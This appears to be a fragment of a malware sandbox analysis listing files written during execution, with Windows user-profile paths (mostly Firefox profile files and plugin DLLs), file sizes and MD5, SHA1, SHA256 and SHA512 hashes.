SHA2561b33dec35c3b0a4d0dbad1bcbace4dd4e80a662f2eeae7e68edc27b863113c33
SHA512ff24c3763053417ee0271d7e79fe7a7b92a194bf5fc179ef9f6b8506b487493d8b252517176d9526042ad738719aa1dc5284bfb54e5abcbe318f1ae007f7626b
-
Filesize
2.0MB
MD5fe574002bc9fde6c7f1b1ecad8cc8cec
SHA1a6e37f4b701611341d8b482e8f5a999e8ca34eb0
SHA2564ca12a7e44e88be3ef1f044eb7e4770e492c81be29015f8c9203c24fd97a7288
SHA512f2ac9e7d99dc050b22bdf83c1840c635bc3d23bb0e9b82cfe3aacdaeef1426a688a44714818127814c4559b31bda650b3e4dc0226316d110794e3e008ee7e22d
-
Filesize
938KB
MD5d7dcdd913bd35547bec8cfcee2bdf4ea
SHA11494afb246db82becbd7000ed3761315f892673d
SHA25652255ef95a5cfa309e10a6a7ddc22140ca74f399d04097e6d498df078a6c79a2
SHA512ac0745c8fb3b8b074314841b391dcaa060182e52c762dad8207aaa43bb512150ff0b12ecb3d08b8576b208cd14b7b6fa6ecaed04947e647b93318e13c4bfbb29
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
143KB
MD5dfa1f9ab10898a049f611d44a2c727d6
SHA1829dd10cc064690c9296889e328cdb29c0880e1f
SHA256861b833dca0b5c2322185fed31cca4ebabd33a691ecdfd640b41ed7dd46ee628
SHA512ae4b5755cc5e5097eae069a7419d40dec1f109f549e24194c81b01016462d07aafebcc04c0bfbd913dea8d41cd63f44aca8f79013f4fd0c4d8f89b81d05113eb
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
9.7MB
MD5d31ae263840ea72da485bcbae6345ad3
SHA1af475b22571cd488353bba0681e4beebdf28d17d
SHA256d4717111251ccd87aed19d387a50770f795dda04d454a97ebe53b27ea3afe1fb
SHA5124782b25ed7defe2891e680fbc0e0557b8212f6309e26f7cb6682f59734fe867cca9f1539dbcb33f5c500ae85c0b06af0e4d45480f296f43fbf3a695dd987b45c
-
Filesize
429KB
MD5d8a7d8e3ffe307714099d74e7ccaac01
SHA1b0bd0dc5af33f9ee7f3cad3b3b1f3057d706ad77
SHA256c5b5c385184b5c2d7ed666beb38bb10b703097573f7a6b42b7fdef78acf99c96
SHA512f46755b7f31d0676f68a97912d031b8354d500ddaed5f60eb10929d861730b5b2d4ba3f67a3141c10d4706c018f58eb42e34e33f70fa90efcabee2ef2cd54631
-
Filesize
1.7MB
MD54c265993ba0bccec886a5bde97daef83
SHA1c85ca0619dac8b5fff735fb069ebebd85a156a54
SHA25697ee6251a4c5471cf4018fc89b44cae101c40950ef8c1010c7376da805d3673b
SHA512f5fb4fa2705b9031e86700c1c2151bc770191ac7a51456adc4673ce776e4ac63ee247c03710f903352611e7df74f655427a6eb69c901f1dafb76ea2e0dd5ed0f
-
Filesize
2.0MB
MD54bf1ceb25a2893275cbdbd4026e51b28
SHA1fe60d4df8f1f6b682ccae4df0d48d1662c8aa8e1
SHA2562063f2c03a2d00224f42942762a5535ce767cd722b5e93cbae5c55cc9c92e255
SHA512de068b35bc94bf8c7a057fe3fa579cccb98cd69b63586604dc1aacc6f6bcb558904703a0e036f2094ea93e885c8334bd33a8571a6343ebb5ad702ccd22c45984
-
Filesize
5.8MB
MD5501080884bed38cb8801a307c9d7b7b4
SHA1881b250cc8f4fa4f75111ac557a4fde8e1e217af
SHA256bf68cf819a1e865170430c10e91c18b427aef88db1da1742020443864aa2b749
SHA51263d74a4871d1c72c2a79ae8a5d380070f9d2128c16949c3ad36c9862fcc4dab738137ed3d51caf0bc46b36655f8bd8a2d425d68200123415ee8d4de0e1cbebc9
-
Filesize
4B
MD5365c9bfeb7d89244f2ce01c1de44cb85
SHA1d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1
-
Filesize
3.3MB
MD55da2a50fa3583efa1026acd7cbd3171a
SHA1cb0dab475655882458c76ed85f9e87f26e0a9112
SHA2562c7b5e41c73a755d34f1b43b958541fc5e633ac3fc6f017478242054b7fe363a
SHA51238ed7d8c728b3abaa5347d7a90206f86cc44cf2512dae9d55a8a71601717665ece7428cbecb929a1c79a63cc078c495c632791d869cc5169d101554c221ddae7
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
6.5MB
MD5438c3af1332297479ee9ed271bb7bf39
SHA1b3571e5e31d02b02e7d68806a254a4d290339af3
SHA256b45630be7b3c1c80551e0a89e7bd6dbc65804fa0ca99e5f13fb317b2083ac194
SHA512984d3b438146d1180b6c37d54793fadb383f4585e9a13f0ec695f75b27b50db72d7f5f0ef218a6313302829ba83778c348d37c4d9e811c0dba7c04ef4fb04672
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ca08f413248038f12237f357e2363490
SHA179ff0e6481a64b98781e8c51df1f356bda7897cd
SHA256fbc5a675ce3135e68c59272fbfe030b5ecc6ed884e4670eeda84e2dcc15096cb
SHA5128a952bd75b92255926385b091c434af8232b191e81abec68f251094a7cf7c9a386afada2a0b5981d69670cac58824476b49b20bc19049539be09fa6e0647c8b7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XEY00GW2PXJEN6P82618.temp
Filesize7KB
MD5b5edc57bcedc85cb78d697835cd515a8
SHA11abd1bcb1564b85c3fc512bd4c11e68b24dd15f2
SHA25608ff1a8b2d76c80474fc834b434a67b9aa39d4b22159dc6a827ddbfe9dae6dfd
SHA5120a71449f8959f390b19eff2189f64522774c4a2bb483a45d1492c3cc0401fac5bb716a37159ab8efe91196af20e0d163960c2ca1575025704c3b1af85726faf7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5cc4217f3d6ba77f0fb4622a90cd304a2
SHA1ec6e4a398380a64c22a5f26d99661786be9be096
SHA2561fa6af35a4210de6a4efb6195696bd87a472f5dd7fef546572f9ee88107edb1a
SHA512e92f08f04d50e8c6316bb47b6d0ac7396ff36aaf8988a2aaa071334b3dbaae7641f256ac72c18954b02b07f83ca48ae7c067dad7321ab6ba91745684915ae13c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\36da3545-3aac-45ef-8f47-3d50335a47ab
Filesize11KB
MD5e1200d21ef03249b34734c75585e3350
SHA1873d1feb06fdf5acba56286dd34ae99f4a86a947
SHA25691309b94174ab3e0cdd010bb853b200bb6d1f5e92805883c3a79365c793b3ee9
SHA512b0a7a07aee5877b2e09384f05f30d0298676313ff515238c5d963fd126cbc6713b1a10359fc3dc88a0af281aaf646e1ef38c39bdf23743eef54ea6509c7416d8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\9ed073a8-caa3-4c0e-883d-5334809b8a6e
Filesize745B
MD548dcb1daa425ca86ed108f848c64a547
SHA1ab15773dab2b284fddd2319b116720b36d274516
SHA25621b012ed3dccc33ee29fc7335fd46f5c867ba17eb8f98d8136b2e978a2707d6f
SHA5128b258219d7364f86673ba95c72169e6af654b7171351ee5cb8355e7a54f3e0db8b4136547d16b80d0b38275de55e6397bfdc27cbe082b9844a89bd274b345916
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json
Filesize372B
MD56981f969f95b2a983547050ab1cb2a20
SHA1e81c6606465b5aefcbef6637e205e9af51312ef5
SHA25613b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665
SHA5129415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll
Filesize10.2MB
MD554dc5ae0659fabc263d83487ae1c03e4
SHA1c572526830da6a5a6478f54bc6edb178a4d641f4
SHA25643cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e
SHA5128e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig
Filesize1KB
MD5dea1586a0ebca332d265dc5eda3c1c19
SHA129e8a8962a3e934fd6a804f9f386173f1b2f9be4
SHA25698fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60
SHA5120e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6
-
Filesize
7KB
MD517d71b71148acd9d21b93b67a863c951
SHA19a2cd9005e50167ff3d28a4fe1c475a742db4572
SHA2566c5e27138d0141af1012aef2e122a3ae861ed62693ee63421f4f9a650636dcd5
SHA51220fc4a7e005560756907038be1a7b73bc42ec4b1bff80ca5619f047a467eb6e73c0bfb60cd360899b0cd2c5f29aad9e609b1b98506365a1a22d9824c7f1a7871
-
Filesize
6KB
MD5e1e5bf1dee1cb2245c06a3518f0bf685
SHA1d6bc2d49394c650e14e26fb99332013e3a203170
SHA25681b76f417b575e62c8c4c3717183fba153b9324caee03c099930e2e5635dd1d7
SHA512cbffcc36796dbb488eda0754a02828ed32aa17afddd1b88a4f1750276fbb55fc22cde976703b0a263065af64fbc186eef8862bf0b2a540d97312dda29b61f3a2
-
Filesize
6KB
MD5ac2294358e93b78e8cbc55601cb1f083
SHA1c7d0f12bacfe407799ed0e80003a0470ee1a7bd5
SHA256ae3f8d1d82c2ed1edd6da0d55372d9d0819744eb431c1e2be5e638f62e3efbf8
SHA512a65c1e2ae648889c241cc40726bbe5d41567a5716e2bc5354f97b190ac7aab371b0e355783a3c737dd8b2ab3355114ccc66fb9594f33b8ce28ec295ed26ba87a
-
Filesize
6KB
MD5f037c9dc9e802c7d7978c139ad4af979
SHA1cb5a2907856ff68fad023caf1bb023b7b2d2c2cb
SHA2564fd7dbc87dba3bd619c803c5b867771af4b80232a8dd08cbdae0c7343b5630d8
SHA512e0524c90dff228e45b4440a1346c796fb74e0ac72f2f490f096762a383517b64bf22f4bec4566f0cd7707491e4740738a891a498675c0eb03d39af611d34a14b
-
Filesize
6KB
MD5d65fff237ccd6a4a8822f0917209c818
SHA13007393b8ad72ff7cf76b99a05e58a19b36a1763
SHA25607e370af2224cc6ffcbca20aac5264075816a6e26803556929d0879f766a27a6
SHA51203f409a985e90db94a09a53c6dd23a7f6887e563132e5d71eba8c868890e6261e1a0c34ac7b7a18046a808671585d5be095af31171c6545c56c0ed387f6a398e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5ec037ddc19e48201c8efc8b8e39d5dee
SHA117b01fd6e219946442d3f9c97509e36c49982d8d
SHA256bed8126c937f91eaee055f666979f76223e62e08acc7b9676e2853cfedbe41b9
SHA512863689166aae5311adeeda9b4ceb5e1caa94bb7f30c45b79aa1fb153bd226ac99b0213502976a5f71c038340ab174a94442124bbca749ff2b314785b8a218db3
-
Filesize
446KB
MD54d20b83562eec3660e45027ad56fb444
SHA1ff6134c34500a8f8e5881e6a34263e5796f83667
SHA256c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1
SHA512718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4
-
Filesize
6.1MB
MD5dc3622e6b86ca86f0f91f56c8dae03ec
SHA176486e21d40269ba73f15a4420e3a09459814b56
SHA2560422bb9a0eb5401ce59b234ac8de4a28f74616b75cca0cd97ebf16fc2632aaf4
SHA5123759b718108b74be94b3e61a310baf1a5f010f33f389c8fb3a19b5b8e0d34471e51092a50688b958039eb4bc300ea0d814608fbaa7f95876eb953bd8faff153b
-
Filesize
3.8MB
MD517f13fc530bc52f8d837689a67b8962a
SHA1e332280450bb598dd077c17a83165ef5e1521614
SHA256ed48b6b1dea8a414989055de0987c9dff063e456b2fab2d06b48f1fe0a660b10
SHA51259d7153ee618bc965fc51ff8ef74f33c246bc503243b4c52a42bded2ab0ddd9fdac6cbfa6babe5330bff2d29252ef6f3fe575f63a69b6080b258cc20ebce7f71
-
Filesize
2.0MB
MD543f71f2a16b258ba3be34d837c0f43ca
SHA110f08b185515267fd1d5d90a395d7fdfc598e9b9
SHA256783dbbb3db6748a2f20364ca4a7803893432316933e7cb1af059bc225e1b4d23
SHA512057c62d80b22ce9e3c15c5076cb1d21c06f55710a95ef8a4bae3ae2a12fdadab78ef9e85fe78ede794e4232102b28c1e2834eb9d5e3428082d6e29eb99e48828